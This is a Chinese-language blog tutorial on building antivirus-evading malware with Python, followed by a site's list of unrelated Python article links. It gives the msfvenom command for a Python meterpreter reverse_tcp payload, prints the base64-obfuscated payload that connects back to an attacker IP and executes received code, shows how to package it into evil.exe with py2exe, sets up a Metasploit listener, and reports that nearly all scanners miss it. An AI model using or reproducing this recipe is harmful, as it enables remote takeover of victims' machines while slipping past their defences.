使用Python进行防病毒免杀解析


Posted in Python onDecember 13, 2019

很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?

打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装

Python 2.7.16 x86:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
Py2exe 32位:https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

使用Python进行防病毒免杀解析

evil.py 代码如下:

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

将evil.py复制到windows,同时创建一个setup.py文件:

from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['evil.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

下面的方法运行 evil.py,生成可执行文件。

python ./setup.py py2exe

使用Python进行防病毒免杀解析

0x03 设置监听端口

Kali 运行Metasploit,设置监听:

msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.28.128
set LPORT 443
run

在Windows中运行evil.exe,获得一个meterpreter的会话

使用Python进行防病毒免杀解析

0x04 免杀验证

确认生成的exe文件可正常工作,接下来对evil.exe进行在线病毒扫描,以确认免杀效果如何。
这里我们使用VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎

使用Python进行防病毒免杀解析

扫描结果:47款杀毒引擎中,只有一个引擎报毒,主流的杀毒软件全部绕过。

网站地址: http://www.virscan.org 

参考文章:

https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

总结

以上所述是小编给大家介绍的使用Python进行防病毒免杀,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持!
如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!

Python 相关文章推荐
python中bisect模块用法实例
Sep 25 Python
在Django的视图中使用form对象的方法
Jul 18 Python
python 添加用户设置密码并发邮件给root用户
Jul 25 Python
Python中文分词工具之结巴分词用法实例总结【经典案例】
Apr 15 Python
名片管理系统python版
Jan 11 Python
Python装饰器的执行过程实例分析
Jun 04 Python
python实现数据清洗(缺失值与异常值处理)
Dec 02 Python
Python for循环通过序列索引迭代过程解析
Feb 07 Python
如何利用Python识别图片中的文字
May 31 Python
python可以用哪些数据库
Jun 22 Python
简单介绍Python的第三方库yaml
Jun 18 Python
Python卷积神经网络图片分类框架详解分析
Nov 07 Python
python 使用shutil复制图片的例子
Dec 13 #Python
基于python traceback实现异常的获取与处理
Dec 13 #Python
python 实现批量替换文本中的某部分内容
Dec 13 #Python
django多种支付、并发订单处理实例代码
Dec 13 #Python
Python+OpenCV+图片旋转并用原底色填充新四角的例子
Dec 12 #Python
Python+OpenCV 实现图片无损旋转90°且无黑边
Dec 12 #Python
使用python去除图片白色像素的实例
Dec 12 #Python
You might like
一个odbc连mssql分页的类
2006/10/09 PHP
PHP file_get_contents 函数超时的几种解决方法
2009/07/30 PHP
php通过文件头检测文件类型通用代码类(zip,rar等)
2010/10/19 PHP
php中将网址转换为超链接的函数
2011/09/02 PHP
深入探究PHP的多进程编程方法
2015/08/18 PHP
PHP7扩展开发教程之Hello World实现方法示例
2017/08/03 PHP
利用jQuery接受和处理xml数据的代码(.net)
2011/03/28 Javascript
javascript延时加载之defer测试
2012/12/28 Javascript
JavaScript建立一个语法高亮输入框实现思路
2013/02/26 Javascript
jQuery中$.fn的用法示例介绍
2013/11/05 Javascript
JavaScript简单实现网页回到顶部功能
2013/11/12 Javascript
Nodejs sublime text 3安装与配置
2014/06/19 NodeJs
JavaScript设计模式之装饰者模式介绍
2014/12/28 Javascript
JS判断日期格式是否合法的简单实例
2016/07/11 Javascript
JS Canvas定时器模拟动态加载动画
2016/09/17 Javascript
vue2.x 父组件监听子组件事件并传回信息的方法
2017/07/17 Javascript
js图片轮播插件的封装
2017/07/21 Javascript
vue-cli的eslint相关用法
2017/09/29 Javascript
vue项目中导入swiper插件的方法
2018/01/30 Javascript
微信小程序中的店铺评分组件及vue中用svg实现的评分显示组件
2018/11/16 Javascript
cocos2dx+lua实现橡皮擦功能
2018/12/20 Javascript
Javascript之高级数组API的使用实例
2019/03/08 Javascript
Nuxt使用Vuex的方法示例
2019/09/06 Javascript
webpack.DefinePlugin与cross-env区别详解
2020/02/23 Javascript
Vue Router 实现动态路由和常见问题及解决方法
2020/03/06 Javascript
jQuery 常用特效实例小结【显示与隐藏、淡入淡出、滑动、动画等】
2020/05/19 jQuery
小程序实现图片移动缩放效果
2020/05/26 Javascript
Python比较2个时间大小的实现方法
2018/04/10 Python
如何优雅地改进Django中的模板碎片缓存详解
2018/07/04 Python
详解python3中的真值测试
2018/08/13 Python
后端开发使用pycharm的技巧(推荐)
2020/03/27 Python
香港化妆品经销商:我的公主
2016/08/05 全球购物
美国庭院家具购物网站:AlphaMarts
2019/04/10 全球购物
Nordgreen手表德国官方网站:丹麦极简主义手表
2019/10/31 全球购物
三方股东合作协议书范本
2014/09/28 职场文书
2021-4-5课程——SQL Server查询【3】
2021/04/05 SQL Server